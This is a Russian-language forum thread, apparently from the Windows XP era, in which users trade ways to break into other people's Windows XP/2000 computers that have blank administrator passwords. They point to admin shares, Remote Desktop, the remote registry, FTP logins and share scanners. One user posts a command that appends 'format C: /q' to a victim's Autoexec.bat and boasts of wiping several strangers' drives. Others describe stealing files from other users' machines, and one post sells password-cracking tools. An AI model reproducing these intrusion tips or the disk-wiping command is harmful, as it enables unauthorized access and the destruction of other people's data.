![]() |
Взлом ХР
Помогите у меня такая хрень,знаю имя пользователя(Administrator) и пароль(Пароля нету).
Операционная система Xp Proffesional. Чо я могу зделать? И если да то чо? И какой прогой пользоватся? |
Ну....подключись к удалённому рабочему столу...
|
Я пытался не получается =(
|
Можешь посмотреть, если по умолчанию стоят настройки в Xp, то там открыты Admin$,c$ и другие диски - можешь зайти на них или еще к примеру использовать службу удаленного реестра :)
|
гг Rpc и ламай себе на здоровье
|
Зачем ломать если есть пароли?
|
а если нет паролей,но надо сломать dialup?
просто диалап сканер не берет(если так можно сказать) например програ Shared Resource Scanner 6.4 free не сканит диалапы=>из этого следует что на комп к диалапщику ваще нельзя залезть? |
ладно.
1)я залез на комп к чуваку(прям щас и сижу) 2)получил командную строку(его) 3)ЧТО ДЕЛАТЬ ДАЛЬШЕ? я знаю,что-у него XP,потом-когда в адресе набираю xxx.xxx.xxx.xxx\C$ то мне предлагается ввести пасс Гостя |
не!у него 2000 винда!
|
Балин, а я думаю что за гости тут ко мне ломятся :d
|
Цитата:
|
Она не совсем полноценная win32 не запустить (по крайне мере у меня не получалось)
Ребут делать не зя. Хоть регать можно, на этом можно сыграть, но у меня геморой с этим был..... |
Хех так и ничего не сказали путного
|
короче единственное полезное,че с удаленной ком. строкой сделать-прописать форматирование диска))))
я так одному чуваку винт форматнул))) просто когда получаешь строку в ней пишешь echo format C: /q >> c:\Autoexec.bat и после рестарта у жертвы винт форматнется))) |
А насчет харды класная вешь!!!
|
насчет формат-я?
да,это конечно классно,когда ты форматируешь людям по нету винты))) но пользы тебе,кромк моральной-никакой. на моей совести 3 винта.)) |
эээ,вопрос не по теме,а тему создавать неохота-че за знак "+" у ников Algol,Егорыч,Че Гевара понятно,но вот у Puff'a тож появился,was ist das?
|
Кстати насчет харды форматирование вылезает только в Win98 так что на Хр и других не попрет!Использует Autoexe.bat только 98 и все а так на Хр пользы от этого нету!!!
|
И еще спасибо кто мозги еб*л,но до меня дошло через может попробовать залезть через Фтп то есть CuteFtp подумал и впил Логин Юзверя и зашел без всяких проблем!!Так что у кого в сетке есть компы наверняка у многих такая же история как у меня.Так что ломитесь нисмотря ни на что!!!=)
|
)))
я по локалке у друга и через Xsharez и через Shared Resource Scanner залезал на компы юзверей-новые фильмы и геймы тырил,так что и без фтп можна))) а еще попробуй вместо логина ввести Администратор(без пасса) или Administrator(тож без него)-иногда пролкатывает. вопрос-как подбирать удаленный пасс на винду? |
научу взлома винди (узнавать\удалять пароли администратора) за 5 минут
я показую вам видео как я ламаю пароль потом если вам нравитса етот метод взлома а он действителен на 100% я вам отсилаю програми которими ви можете взломать винду как я на видеоуроке ламал Услуга по предоставлению видеоурока БЕСПЛАТА А ПРОГРАМИ ДЛЯ ВЗЛОМА ВИНДИ ПЛАТНИ (ПО ВЕБ МАНИ ИЛИ КУПЛЯЕТЕ МНЕ КАРТОЧКУ ПОПОЛНЕНИЯ СЧЕТА на мобилу) вот пример взлома на видеоуроке http://rapidshare.com/files/246253849/MVI_3983.mp4.html качайте смотрите а за програмой для етово взлома СТУЧИТЕ В АСЮ 418296231 ИЛИ ПИШИТЕ НА МИЛО tyz0101@mail.ru Не знаешь - плати тем, кто знает. Не хочешь платить - учись и делай сам. |
археолог =\
|
Его виндю взломали и украли русский язык
|
он из Украины
|
|
http://www.demotivation.ru/ehq5rv007zglpic.html
вот в тему, попросили разместить. |
2 tyz0101
потерпи до 1 сентября, всего 2 месяца осталось. И запомни - археология это плохо. А свои услуги одноклассникам рекламируй. Тут люди и без тебя всё умеют. |
Цитата:
|
Цитата:
Цитата:
Цитата:
|
| Время: 00:14 |